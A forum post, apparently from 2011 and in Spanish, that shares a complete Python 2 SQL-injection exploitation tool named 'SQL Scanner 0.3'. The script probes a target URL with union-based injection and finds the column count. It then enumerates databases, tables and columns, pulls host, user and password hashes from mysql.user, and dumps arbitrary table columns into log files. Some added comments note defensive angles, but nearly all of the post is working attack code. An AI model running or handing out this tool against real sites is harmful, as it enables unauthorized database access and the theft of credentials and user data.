
[Python] SQL Scanner 0.3


Desconectado BigBear

« en: Julio 03, 2011, 09:36:57 pm »
Bueno este es un simple scanner en python que hice para SQLI

Con las siguientes opciones:

  • Verifica vulnerabilidad
  • Busca columnas
  • Busca el numero milagroso y saca info sobre la DB
  • Saca tablas y columnas de la DB actual o de otra externa
  • Dumpear usuarios
  • Guarda todo en un log con el nombre de la web en la carpeta /logs
Código: Python
  1. #!usr/bin/python
  2. #SQL Scanner 0.3 (C) Doddy Hackman 2010
  3.  
  4. import os,sys,urllib2,re,binascii
  5. from urlparse import urlparse
  6.  
def clean():
 """Clear the terminal: ``cls`` on Windows, ``clear`` everywhere else."""
 command = "cls" if sys.platform == "win32" else "clear"
 os.system(command)
  12.  
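def savefile(name,text):
 """Append ``text`` to the file ``name``, surrounded by newlines.

 The file is opened in append mode and created when missing, but the
 directory must already exist (the callers in this script write under
 ``logs/``). A ``with`` block guarantees the handle is closed even if the
 write fails; the original left it open on that path and shadowed the
 ``file`` builtin.
 """
 with open(name,"a") as handle:
  handle.write("\n"+text+"\n")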
  17.  
def gethost(test):
 """Return the network-location part (``host[:port]``) of the URL ``test``.

 Used by the callers to build the per-target log file name under ``logs/``.
 """
 parsed = urlparse(test)
 return parsed.netloc
  20.  
def header() :
 """Write the tool banner to stdout (same bytes the print statement emitted)."""
 sys.stdout.write("\n--== SQL Scanner ==--\n\n")
  23.  
def copyright() :
 """Write the credits line and terminate the process with exit status 1.

 Note that this shadows the ``copyright`` builtin installed by ``site``.
 """
 sys.stdout.write("\n\n(C) Doddy Hackman 2010\n\n")
 sys.exit(1)
  27.  
def show() :
 """Write the usage line ``<script> <web>`` to stdout.

 The wording (including "Sintax") is the program's own output and is kept
 byte-for-byte; the double spaces reproduce the separators the original
 comma-separated print statement inserted.
 """
 sys.stdout.write("\n[*] Sintax :  %s  <web>\n\n" % sys.argv[0])
  30.  
def toma(web) :
 """GET ``web`` and return the raw response body.

 Sends a fixed Firefox 3.0.5 User-Agent; from a defender's side that
 constant string is a stable fingerprint of this tool in web-server logs.
 ``urllib2`` errors (HTTPError, URLError) propagate to the caller, and the
 response object is not closed explicitly, exactly as in the original.
 """
 agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'
 request = urllib2.Request(web, headers={'User-Agent': agent})
 opener = urllib2.build_opener()
 response = opener.open(request)
 return response.read()
  36.  
def bypass(bypass):
 """Map a comment style to the ``(separator, terminator)`` pair used in requests.

 ``"/*"`` yields ``("/**/", "/*")``; ``"--"`` and any other value yield
 ``("+", "--")``. The parameter deliberately keeps the original name even
 though it shadows the function itself.
 """
 pairs = {
  "--": ("+","--"),
  "/*": ("/**/","/*"),
 }
 return pairs.get(bypass, ("+","--"))
  44.  
  45.  
def dumper(web,passx,table,col1,col2):
 """Count the rows of ``table`` through the injected query, then fetch
 ``col1``/``col2`` one row at a time, printing and logging each pair.

 ``web`` must still contain the literal placeholder ``hackman`` (the
 target string that findlength builds); it is replaced by the selected
 expression. Values are wrapped in the markers K0BRA (0x4b30425241) and
 K0BRA1 (0x4B3042524131) so they can be located in the response with a
 regex. ``table``, ``col1`` and ``col2`` are interpolated verbatim, and the
 response text is written to the log as-is.
 """

 pass1,pass2 = bypass(passx)
 # Row-count query (count(*)) wrapped in the K0BRA markers.
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 # Per-row query: col1 between K0BRA markers, col2 between K0BRA1 markers.
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
 code1 = toma(web1+pass1+"from"+pass1+table+pass2)
 print "\n\n[+] Searching values\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] Values Found : ",numbers,"\n"
  # int() raises ValueError if the captured text is not a number; nothing
  # here catches it (the caller's bare except in menu does).
  for counter in range(0,int(numbers)):
   # One request per row, paged with "limit <counter>,1".
   code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    c1 = re.findall("K0BRA(.*?)K0BRA",code2)
    c1 = c1[0]

    # Only the K0BRA match is checked above; c2[0] raises IndexError when
    # the K0BRA1 markers are missing from the response.
    c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
    c2 = c2[0]
    print "["+col1+"] : "+c1
    print "["+col2+"] : "+c2+"\n"
    # Log file name is derived from the target host; logs/ must exist.
    savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
    savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
 else:
  print "[-] Not Found\n"
  71.  
  72.  
  73.  
def mysqluser(web,passx):
 """Count the rows of ``mysql.user`` and list Host/User/Password per row.

 Same marker scheme as dumper: K0BRA (0x4b30425241) around Host, K0BRA1
 (0x4B3042524131) around User and K0BRA2 (0x4B3042524132) around
 Password. Reading ``mysql.user`` only works when the web application's
 database account has privileges on the ``mysql`` schema, so a
 least-privilege account makes this step return "Not Found".
 """
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 print "\n\n[+] Searching mysql.user\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] mysql.user : ON"
  savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  print "[+] Users Found : ",numbers,"\n"
  # int() on non-numeric captured text raises ValueError (uncaught here).
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    host = re.findall("K0BRA(.*?)K0BRA",code2)
    host = host[0]

    # Only the K0BRA match is guarded; user[0] / passw[0] raise IndexError
    # if the K0BRA1 / K0BRA2 markers are absent from the response.
    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
    user = user[0]

    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
    passw = passw[0]
    # Credential material is written to a plain-text file under logs/.
    savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
    savefile("logs/"+gethost(web)+".txt","[User] : "+user)
    savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
    print "[Host] : "+host
    print "[User] : "+user
    print "[Pass] : "+passw+"\n"
 else:
  print "[-] Not Found\n"
  106.  
  107.  
  108.  
def showcolumnsdb(web,db,table,passx):
 """List the columns of ``table`` in schema ``db`` via information_schema.columns.

 ``db`` and ``table`` are rebound to their ``0x...`` hex-literal form
 (binascii.hexlify on a Python 2 str) before being placed in the query, so
 the log lines below record the hex form, not the names typed by the user.
 Parameter order differs from showcolumns (which takes the table first).
 """
 db = "0x"+str(binascii.hexlify(db))
 table = "0x"+str(binascii.hexlify(table))
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
 print "\n\n[+] Searching columns in DB\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
  # NOTE(review): this second line holds the table but is labelled "[DB]";
  # the label is a runtime string and is left as the author wrote it.
  savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"
  # int() raises ValueError on non-numeric captured text (uncaught here).
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
    print "[Column Found] : "+column

 else:
  print "[-] Not Found\n"
  134.  
  135.  
def showtablesdb(web,db,passx):
 """List the tables of schema ``db`` via information_schema.tables.

 ``db`` is rebound to its ``0x...`` hex-literal form first, so the
 "[DB]" log line records that form. That log line is written before the
 result check, so a miss still leaves an entry in the log.
 """
 db = "0x"+str(binascii.hexlify(db))
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
 print "\n\n[+] Searching tables in DB\n\n"
 savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"
  # int() raises ValueError on non-numeric captured text (uncaught here).
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)

   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"
  159.  
  160.  
  161.  
def showtables(web,passx):
 """List table names from information_schema.tables (all schemas).

 Unlike the other listing functions the row loop starts at a hard-coded
 offset of 17, so the first 17 rows are never shown and a count of 17 or
 less lists nothing — intent not recorded by the author, TODO confirm.
 """
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 print "\n\n[+] Searching tables\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"
  # Hard-coded start offset; see docstring.
  for counter in range(17,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"
  182.  
  183.  
  184.  
def showcolumns(tabla,web,passx):
 """List the columns of ``tabla`` via information_schema.columns (any schema).

 ``tabla`` is rebound to its ``0x...`` hex-literal form, so the
 "[Table Found]" log line (written before the result check) records the
 hex form. The progress message says "Searching tables" although columns
 are searched; it is a runtime string and is left unchanged here. Note the
 parameter order (table, web, passx) differs from showcolumnsdb.
 """
 pass1,pass2 = bypass(passx)
 tabla = "0x"+str(binascii.hexlify(tabla))
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
 print "\n\n[+] Searching tables\n\n"
 savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"
  # int() raises ValueError on non-numeric captured text (uncaught here).
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    print "[Column Found] : "+column
    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
 else:
  print "[-] Not Found\n"
  207.  
  208.  
  209.  
  210.  
def showdbs(web,passx):
 """List schema names from information_schema.schemata, one request per row.

 Same structure as the other listing functions: a count query wrapped in
 the K0BRA markers, then "limit <n>,1" paging for each row; results are
 printed and appended to the per-host log.
 """
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
 print "\n\n[+] Searching DBS\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] DBS Found : ",numbers,"\n"
  # int() raises ValueError on non-numeric captured text (uncaught here).
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    db = re.findall("K0BRA(.*?)K0BRA",code2)
    db = db[0]
    print "[DB Found] : "+db
    savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
 else:
  print "[-] Not Found\n"
  231.  
  232.  
  233.  
  234.  
def menu(page,bypass):
 """Interactive option menu for an already-prepared target URL ``page``.

 ``bypass`` here is the comment-style string, not the bypass() function
 (the parameter shadows it inside this body). Every option re-enters
 menu() recursively instead of looping, so the call stack grows by one
 frame per action and will eventually hit Python's recursion limit in a
 long session. menu() never returns normally: it ends only through
 copyright()/sys.exit.
 """
 clean()
 header()
 print "\n[+] Target : ",page,"\n"
 print "\n[information_schema]\n\n"
 print "1 - Show tables\n"
 print "2 - Show columns of the a table\n"
 print "3 - Show databases\n"
 print "4 - Show tables from the a DB\n"
 print "5 - Show columns from the a table of the DB\n"
 print "\n[mysql.user]\n\n"
 print "6 - Show users\n"
 print "\n[Others]\n\n"
 print "7 - Show details\n"
 print "8 - Dump data\n"
 print "9 - Show log\n"
 print "10 - Change target\n"
 print "11 - Exit\n\n"
 try:
  # Python 2 input() evaluates the typed text as an expression, which is
  # why the comparisons below are against ints; anything that is not a
  # valid expression raises and lands in the bare except.
  op = input("[Option] : ")
  if op == 1:
   showtables(page,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 2:
   table = raw_input("\n\n[Table] : ")
   showcolumns(table,page,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 3:
   showdbs(page,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 4:
   db = raw_input("\n\n[DB] : ")
   showtablesdb(page,db,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 5:
   db = raw_input("\n\n[DB] : ")
   table = raw_input("\n\n[Table] : ")
   showcolumnsdb(page,db,table,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 6:
   mysqluser(page,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 7:
   more(page,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 8:
   table = raw_input("\n\n[Table] : ")
   col1 = raw_input("\n\n[Column 1] : ")
   col2 = raw_input("\n\n[Column 2] : ")
   dumper(page,bypass,table,col1,col2)
   raw_input()
   menu(page,bypass)
  elif op == 9:
   # Windows-only ("start"); the host part of the user-typed URL is
   # passed to the shell unquoted.
   os.system("start logs/"+gethost(page)+".txt")
   menu(page,bypass)
  elif op == 10:
   # sta() -> scan() may call copyright(); its SystemExit is raised inside
   # this try and is swallowed by the bare except below.
   sta()
 except:
  # Bare except: every error (ValueError from int(), IndexError from a
  # missing marker, network errors, even KeyboardInterrupt and SystemExit)
  # is silently turned into a redraw of the menu.
  menu(page,bypass)
 # Option 11 is handled outside the try so sys.exit actually terminates.
 if op == 11:
  copyright()
  303.  
  304.  
def more(web,passx):
 """Print and log user(), database() and version(), then probe whether
 ``mysql.user`` and ``information_schema.tables`` are readable.

 The three values are returned between the outer marker 3MP3Z4R
 (0x334d50335a3452) and separated by K0BRA (0x4b30425241); re.split on
 K0BRA therefore yields them at indices 1, 2 and 3. The two follow-up
 probes only test for the presence of the K0BRA marker in the response.
 """
 pass1,pass2 = bypass(passx)
 print "\n[+] Searching more data\n"
 web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
 code0 = toma(web1+pass2)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  datar = re.split("K0BRA",datax[0])
  # datar[0] is the empty prefix before the first K0BRA.
  print "[+] Username :",datar[1]
  print "[+] Database :",datar[2]
  print "[+] Version :",datar[3],"\n"
  savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
 # Readability probe: a least-privilege DB account yields no marker here.
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   print "[+] mysql.user : on"
   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   print "[+] information_schema.tables : on"
   savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
  327.  
def findlength(web,passx):
 """Grow a marker-wrapped select list from 2 to 29 entries until one of the
 K0BRA-wrapped numbers shows up in the response, then build the target
 URL for menu() with that position replaced by the ``hackman`` placeholder.

 ``web`` is the bare URL; the request appends ``-1``, ``union``, ``select``
 and the list, joined by the separator from bypass(). Control passes to
 menu() on the first hit and menu() does not return normally, so the
 trailing "Length dont found" message is reached only when no length in
 2..29 produced a marker.
 """
 pass1,pass2 = bypass(passx)
 print "\n[+] Finding columns length"
 number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
 for te in range(2,30):
  number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code)):
   numbers = re.findall("K0BRA(.*?)K0BRA",code)
   print "[+] Column length :",te
   print "[+] Numbers",numbers,"print data"
   sql = ""
   tex = te + 1
   # Builds "1,2,...,te"; sqli is reassigned on every iteration and only
   # its final value is used.
   for sqlix in range(2,tex):
    sql = str(sql)+","+str(sqlix)
    sqli  = str(1)+sql
   # numbers[0] is used as a regex pattern and re.sub replaces every
   # occurrence of it in the list, not just the matching position.
   sqla = re.sub(numbers[0],"hackman",sqli)
   savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
   menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)

 print "[-] Length dont found\n"
  349.    
  350.    
def scan(web,passx):
 """Vulnerability check: send one ``union select 1`` request and look for
 MySQL's verbose column-count error text in the response (case-insensitive).

 The detection relies entirely on the application echoing the database
 error message; from the defender's side, returning generic error pages
 and alerting on the ``union select`` pattern in request logs removes this
 signal. On a hit control passes to findlength(); otherwise copyright()
 terminates the process with exit status 1.
 """
 pass1,pass2 = bypass(passx)
 print "\n\n[+] Testing vulnerability"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
 if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  print "[+] SQLI Detected"
  findlength(web,passx)
 else:
  print "[-] Not Vulnerable"
  copyright()
  361.  
  362.  
def sta():
 """Interactive start: clear the screen, show the banner, prompt for the
 target URL and the comment style, then run scan().

 The comment style is passed through bypass() by the callees; any value
 other than "--" or "/*" falls back to ("+", "--"). The command-line
 usage printed by show() is never used: the URL is always prompted for.
 """

 clean()
 header()

 web = raw_input("\n\n[Page] : ")
 bypasx = raw_input("\n\n[Bypass] : ")
 scan(web,bypasx)
  371.  
sta()  # entry point; runs at import time too (no __main__ guard)
  373.  
  374. #The End
  375.  
« Última modificación: Julio 07, 2011, 07:03:09 pm por Sthefano02 »

 



